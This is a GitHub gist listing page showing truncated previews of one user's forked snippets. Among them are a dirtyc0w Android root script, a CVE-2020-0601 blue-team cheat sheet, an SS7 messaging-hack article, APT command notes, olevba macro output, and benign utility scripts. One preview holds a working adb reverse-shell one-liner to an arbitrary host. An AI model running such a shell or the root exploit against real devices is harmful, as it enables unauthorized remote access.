Skip to content

Instantly share code, notes, and snippets.

Avatar

Yuhisern Yehohanan yuhisern7

  • Malaysia
View GitHub Profile
@yuhisern7
yuhisern7 / root.sh
Created May 25, 2021 — forked from Arinerron/root.sh
"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
View root.sh
#!/bin/bash
# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
@yuhisern7
yuhisern7 / 20200114-TLP-WHITE_CVE-2020-0601.md
Created May 24, 2021 — forked from SwitHak/20200114-TLP-WHITE_CVE-2020-0601.md
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC
View 20200114-TLP-WHITE_CVE-2020-0601.md

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
View How To Hack WhatsApp & Telegram Using SS7 Flaw
Researchers are easily able to hack WhatsApp and Telegram using the known telecom flaw
We continuously receive queries from readers about how to hack WhatsApp. The world’s most popular cross platform messaging App is seen to be ultimate hack by many because it has recently enabled 256-bit encryption.
For ordinary souls this encryption would take days and months to decode a sentence or a complete message. Ditto with another secure messaging service called Telegram. Though Telegram is not as popular as WhatsApp, it has its ardent group of followers who use it for its encryption as well as snooping free service.
Though both of these Apps are end-to-end encrypted both of them suffer from hardware side vulnerability which can be exploited to hack and hijack both WhatsApp and Telegram.
The vulnerability lies in Signalling System 7, or SS7, the technology used by telecom operators, on which the highly secure messaging system and telephone calls rely. SS7 is a set of telephony signalling protocols developed i
@yuhisern7
yuhisern7 / iranian_apit_groups_possible_commands.md
Created Feb 11, 2020 — forked from MSAdministrator/iranian_apit_groups_possible_commands.md
Iranian APT Groups & Possible Commands Used By These Groups
View iranian_apit_groups_possible_commands.md

Overview

The following content is generated using a preview release of Swimlane's pyattck.

This snippet of data is scoped to the following actor groups:

  • APT33
  • APT34
  • APT39
  • Charming Kitten
@yuhisern7
yuhisern7 / StraightQuotes2CurlyQuotes.bas
Created Dec 19, 2019 — forked from Tintazul/StraightQuotes2CurlyQuotes.bas
LibreOffice Macro: straight single and double quotes to curly ones
View StraightQuotes2CurlyQuotes.bas
sub StraightQuotes2CurlyQuotes
' Kudos to David for main code: https://gist.github.com/dajare/3924560
' Kudos to Villeroy for simpler, better find patterns:
' https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=39902
' Kudos to Kaloian Droganov for how to make the macro atomic:
' http://stackoverflow.com/questions/853372/how-to-make-a-macro-atomic
rem ----------------------------------------------------------------------
dim document as object
dim dispatcher as object
dim undo as object
View a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
@yuhisern7
yuhisern7 / example_script_analysis_office.ps1
Created Dec 19, 2019 — forked from christlc/example_script_analysis_office.ps1
SAP Analysis Office Excel Auto refresh with powershell (without Excel Macro)
View example_script_analysis_office.ps1
param(
[string]$baseDir = "C:\SomeFolderToStoreTheData\",
[string]$bw_client = "000",
[string]$bw_user = "YOURUSERNAME",
[string]$bw_password = "YOURPASSWORD",
[string]$filePath = "Path to Analysis Office Excel.xlsx",
[string]$year_column = "Analysis Technical Name of Year column"
)
# Essentially the Powershell version of https://blogs.sap.com/2016/12/18/automated-updating-of-data-in-excel-files-bex-ao-via-vbavbscript/
View android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
View email-masking.js
/* Not sure if this has any effect against email scraping bots but it's an idea.
It just outputs the string as an array of character codes, then restores it
real characters after the page loads. With javascript disabled we fail. :( */
// PHP function ///////////////////////////////////
function mask($str) {
$mask = "";
for($c=0;$c<strlen($str);$c++) {
$mask .= "" . ord($str[$c]) . ",";
}
@yuhisern7
yuhisern7 / emailmask.js
Created Oct 14, 2019 — forked from gabrielfroes/emailmask.js
Javascript Email Mask
View emailmask.js
/*
Create a Mask in an email address
This function create a mask using a valid email address.
This is usefull when someone need to confirm the email used in a system
Author: Gabriel Froes - https://gist.github.com/gabrielfroes
*/
function emailMask(email) {
var maskedEmail = email.replace(/([^@\.])/g, "*").split('');
var previous = "";
for(i=0;i<maskedEmail.length;i++){